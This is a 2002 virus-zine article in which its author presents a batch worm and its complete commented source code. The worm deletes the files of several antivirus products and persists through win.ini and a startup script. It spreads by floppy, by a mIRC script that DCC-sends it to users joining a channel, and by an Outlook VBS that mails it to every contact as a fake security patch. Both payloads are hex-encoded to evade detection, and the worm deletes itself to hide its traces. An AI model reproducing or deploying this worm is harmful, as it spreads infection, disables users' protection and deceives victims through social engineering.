+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ / bat.windows by philet0ast3r [rRlf] / +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ 010101 10010001 00 001101001 00 01 11 01110011010 01 11 00 00 11 10 010 10 11 00 100100110101100010 00 00 10 0100011100100101011 01 01 01 01010 01 101100110001010 0101 01100010 11001001010001 1001 01011000110 10 010 100 10 0110 01 110 011 01 0001 11 011 010 01 0100 00 0110 10 1010 10 10 00 01101 00 11 01 www.rRlf.de We have got March 2002 now, and this is my 11th virus ... But actually it's not a virus but my 1st pure worm, so it doesn't infect files anymore, like all of my former virii/worms. Loss in code-quality, but ... who has still that much batch files on his computer? The infection-routine was anyway just there for triggering heuristics. This one is a tribute to the main reason there's such a cool VX scene. It will probably be one of the last virii by me released in a zine. Here are some facts: -Outlook worm (with the help of a quite common vbs) subject: Newest Windows Security Patch! body: A new Loveletter version is making the rounds. This version is able to steal your internet-access username and password. Here is the newest AntiVirus Patch against it. -mIRC worm -the Outlook- and mIRC-routines are debuged, to trigger no heuristics -spreads via disks -"residency" through win.ini -retro: Norton AntiVirus 2000, AntiVir /9X Personal Edition, F-Prot 95, McAfee, Thunderbyte -payload: creates a little vbs located in the autostart-directory; it only shows this message to the user: welc0me to the best selling bug of the whole phuckin' universe: message box title: bat.windows by philet0ast3r [rRlf] -deletes the running virus after everything is finished (except when started through the win.ini-residency), so that the curious user can't look afterwards what this little batch has now actually done ... I don't know exactly if this has done before, but I know a lot of batch-virii, and I guess not ... if someone knows an older batch-virus with this ability, please tell me -fully compatible to Windows ME, Windows 98, Windows 95 (has been tested) -size: 4.746 bytes philet0ast3r likes to greet/thank: 3ri5, alcopaul [rRlf], disc0rdia [rRlf], dr.g0nZo [rRlf], El DudErin0 [rRlf], ppacket [rRlf], PetiK, Zoom23 [PVW], rastafarie, Necronomikon [ZG], Energy, pissn3lk [AFN], herm1t, BeLiAL [BC], ToxiC, mgl [*], BTK, SnakeByte [MVX], Benny [29A], MalFunction, toro [TKT], Satanico [BC], Senna Spy, Zarrmann, nuerble, ina, El Commandante, bafra, Mindjuice. Well, here is the code ... with comments "::" These comments refer always to the code above and should be removed to "compile" virus. But for the lazy ones: It's not neccessary, but decreases size ... and the victim does not know that easy what this batch is doing ;) Phile-name is equal, but has to end with ".bat" :D =====[begin code]=============================================================== @echo off :: guess what ;) ctty nul :: output-device is set to nul, so no (error) message is sent to the user copy %0 c:\bat.windows.bat :: %0 is the running batch echo this file is important>c:\sig.sys :: creates c:\sig.sys ... gets really important later ;) del c:\programme\norton~1\s32integ.dll del c:\programme\f-prot95\fpwm32.dll del c:\programme\mcafee\scan.dat del c:\tbavw95\tbscan.sig del c:\programme\tbav\tbav.dat del c:\tbav\tbav.dat del c:\programme\avpersonal\antivir.vdf :: the AVs will get problems scanning without those files echo.on error resume next>msg echo MsgBox "welc0me to the best selling bug of the whole phuckin' universe:",4096,"bat.windows by philet0ast3r [rRlf]">>msg move msg %winbootdir%\startmen\programme\autostart\windows.vbs :: the payload-vbs gets created and moved to the start-up-folder :: because of the the %winbootdir%, the name of the windows-directory, :: (and on what drive it's located) is equal del c:\mirc\script.ini del c:\mirc32\script.ini del c:\progra~1\mirc\script.ini del c:\progra~1\mirc32\script.ini :: preparation for the mIRC worm copy c:\bat.windows.bat + %winbootdir%\win.ini %winbootdir%\system\win.ini del %winbootdir%\win.ini move %winbootdir%\system\win.ini %winbootdir%\win.ini :: this infects the win.ini goto 23 [windows] load=c:\bat.windows.bat run=C:\WINDOWS\SYSTEM\cmmpu.exe NullPort=None :23 :: the part that gets jumped over is win.ini like :: it executes the virus on every start-up :: the empty lines are neccessary for windows taking this as true win.ini command /f /c copy c:\bat.windows.bat a:\ :: this command line makes it possible to copy to diskettes :: there will be no error if there is no disk in drive a: :: or if it is writeprotected or full echo e 0100 5B 73 63 72 69 70 74 5D 0D 0A 6E 30 3D 6F 6E 20>5 echo e 0110 31 3A 4A 4F 49 4E 3A 23 3A 7B 20 0D 0A 6E 31 3D>>5 echo e 0120 20 2F 69 66 20 28 20 6E 69 63 6B 20 3D 3D 20 24>>5 echo e 0130 6D 65 20 29 20 7B 20 68 61 6C 74 20 7D 20 0D 0A>>5 echo e 0140 6E 32 3D 20 2F 2E 64 63 63 20 73 65 6E 64 20 24>>5 echo e 0150 6E 69 63 6B 20 63 3A 5C 62 61 74 2E 77 69 6E 64>>5 echo e 0160 6F 77 73 2E 62 61 74 20 0D 0A 6E 33 3D 7D 20 0B>>5 echo rcx>>5 echo 006F>>5 echo n script.ini>>5 echo w>>5 echo q>>5 debug<5 del 5 :: this creates a debug-script ... and debugs it :: the result is a mIRC-script-file (code see below) :: this should help against mIRC-batch-worm-heuristics :: with NortonAV it does move script.ini c:\mirc\script.ini move script.ini c:\mirc32\script.ini move script.ini c:\progra~1\mirc\script.ini move script.ini c:\progra~1\mirc32\script.ini del script.ini :: the created mIRC-script-file gets moved to a possible mIRC-directory if exist %winbootdir%\wyrm.vbs goto suicide :: checks if the Outlook-worm-vbs exists already, to save some time echo e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>23 echo e 0110 6E 65 78 74 20 0D 0A 64 69 6D 20 61 2C 62 2C 63>>23 echo e 0120 2C 64 2C 65 20 0D 0A 73 65 74 20 61 20 3D 20 57>>23 echo e 0130 73 63 72 69 70 74 2E 43 72 65 61 74 65 4F 62 6A>>23 echo e 0140 65 63 74 28 22 57 73 63 72 69 70 74 2E 53 68 65>>23 echo e 0150 6C 6C 22 29 20 0D 0A 73 65 74 20 62 20 3D 20 43>>23 echo e 0160 72 65 61 74 65 4F 62 6A 65 63 74 28 22 4F 75 74>>23 echo e 0170 6C 6F 6F 6B 2E 41 70 70 6C 69 63 61 74 69 6F 6E>>23 echo e 0180 22 29 20 0D 0A 73 65 74 20 63 20 3D 20 62 2E 47>>23 echo e 0190 65 74 4E 61 6D 65 53 70 61 63 65 28 22 4D 41 50>>23 echo e 01A0 49 22 29 20 0D 0A 66 6F 72 20 79 20 3D 20 31 20>>23 echo e 01B0 54 6F 20 63 2E 41 64 64 72 65 73 73 4C 69 73 74>>23 echo e 01C0 73 2E 43 6F 75 6E 74 20 0D 0A 73 65 74 20 64 20>>23 echo e 01D0 3D 20 63 2E 41 64 64 72 65 73 73 4C 69 73 74 73>>23 echo e 01E0 28 79 29 20 0D 0A 78 20 3D 20 31 20 0D 0A 73 65>>23 echo e 01F0 74 20 65 20 3D 20 62 2E 43 72 65 61 74 65 49 74>>23 echo e 0200 65 6D 28 30 29 20 0D 0A 66 6F 72 20 6F 20 3D 20>>23 echo e 0210 31 20 54 6F 20 64 2E 41 64 64 72 65 73 73 45 6E>>23 echo e 0220 74 72 69 65 73 2E 43 6F 75 6E 74 20 0D 0A 66 20>>23 echo e 0230 3D 20 64 2E 41 64 64 72 65 73 73 45 6E 74 72 69>>23 echo e 0240 65 73 28 78 29 20 0D 0A 65 2E 52 65 63 69 70 69>>23 echo e 0250 65 6E 74 73 2E 41 64 64 20 66 20 0D 0A 78 20 3D>>23 echo e 0260 20 78 20 2B 20 31 20 0D 0A 6E 65 78 74 20 0D 0A>>23 echo e 0270 65 2E 53 75 62 6A 65 63 74 20 3D 20 22 4E 65 77>>23 echo e 0280 65 73 74 20 57 69 6E 64 6F 77 73 20 53 65 63 75>>23 echo e 0290 72 69 74 79 20 50 61 74 63 68 21 22 20 0D 0A 65>>23 echo e 02A0 2E 42 6F 64 79 20 3D 20 22 41 20 6E 65 77 20 4C>>23 echo e 02B0 6F 76 65 6C 65 74 74 65 72 20 76 65 72 73 69 6F>>23 echo e 02C0 6E 20 69 73 20 6D 61 6B 69 6E 67 20 74 68 65 20>>23 echo e 02D0 72 6F 75 6E 64 73 2E 20 54 68 69 73 20 76 65 72>>23 echo e 02E0 73 69 6F 6E 20 69 73 20 61 62 6C 65 20 74 6F 20>>23 echo e 02F0 73 74 65 61 6C 20 79 6F 75 72 20 69 6E 74 65 72>>23 echo e 0300 6E 65 74 2D 61 63 63 65 73 73 20 75 73 65 72 6E>>23 echo e 0310 61 6D 65 20 61 6E 64 20 70 61 73 73 77 6F 72 64>>23 echo e 0320 2E 20 48 65 72 65 20 69 73 20 74 68 65 20 6E 65>>23 echo e 0330 77 65 73 74 20 41 6E 74 69 56 69 72 75 73 20 50>>23 echo e 0340 61 74 63 68 20 61 67 61 69 6E 73 74 20 69 74 2E>>23 echo e 0350 22 20 0D 0A 65 2E 41 74 74 61 63 68 6D 65 6E 74>>23 echo e 0360 73 2E 41 64 64 20 28 22 63 3A 5C 62 61 74 2E 77>>23 echo e 0370 69 6E 64 6F 77 73 2E 62 61 74 22 29 20 0D 0A 65>>23 echo e 0380 2E 44 65 6C 65 74 65 41 66 74 65 72 53 75 62 6D>>23 echo e 0390 69 74 20 3D 20 46 61 6C 73 65 20 0D 0A 65 2E 53>>23 echo e 03A0 65 6E 64 20 0D 0A 66 20 3D 20 22 22 20 0D 0A 6E>>23 echo e 03B0 65 78 74 20 27>>23 echo rcx>>23 echo 02B4>>23 echo n wyrm.vbs>>23 echo w>>23 echo q>>23 debug<23 del 23 :: this creates a second debug-script ... and also debugs it :: the result is a Outlook-worm-vbs (code see below) :: problem: if an (up to date) AV-monitor is active, the AV will :: probably pop up a warning: "new vbs worm" or something like that :: this is the weakest part, so it gets executet last :: sense of the debugging: the heuristic is not triggered too soon move wyrm.vbs %winbootdir% :suicide start %winbootdir%\wyrm.vbs :: well, the Outlook-worm-vbs gets executed if not exist sig.sys del %0 :end :: if the at the beginning created file sig.sys is not in the same directory, :: the running batch gets deleted, so the user can't look into the file afterwards :: sig.sys and the running batch are probably only in the same directory, :: when the virus gets started through the win.ini-residency =====[end code]================================================================= That is the content of the mIRC-script-file: =====[begin code]=============================================================== [script] n0=on 1:JOIN:#:{ n1= /if ( nick == $me ) { halt } n2= /.dcc send $nick c:\bat.windows.bat n3=} =====[end code]================================================================= And the code of the Outlook-worm-vbs ... I guess everyone has seen something like that often before :( But probably not so often in a batch-virus :) =====[begin code]=============================================================== on error resume next dim a,b,c,d,e set a = Wscript.CreateObject("Wscript.Shell") set b = CreateObject("Outlook.Application") set c = b.GetNameSpace("MAPI") for y = 1 To c.AddressLists.Count set d = c.AddressLists(y) x = 1 set e = b.CreateItem(0) for o = 1 To d.AddressEntries.Count f = d.AddressEntries(x) e.Recipients.Add f x = x + 1 next e.Subject = "Newest Windows Security Patch!" e.Body = "A new Loveletter version is making the rounds. This version is able to steal your internet-access username and password. Here is the newest AntiVirus Patch against it." e.Attachments.Add ("c:\bat.windows.bat") e.DeleteAfterSubmit = False e.Send f = "" next =====[end code]================================================================= That's all, ppl. Hope this enjoyed you a bit. Something you want to tell me? ... Equal what: philet0ast3r@rRlf.de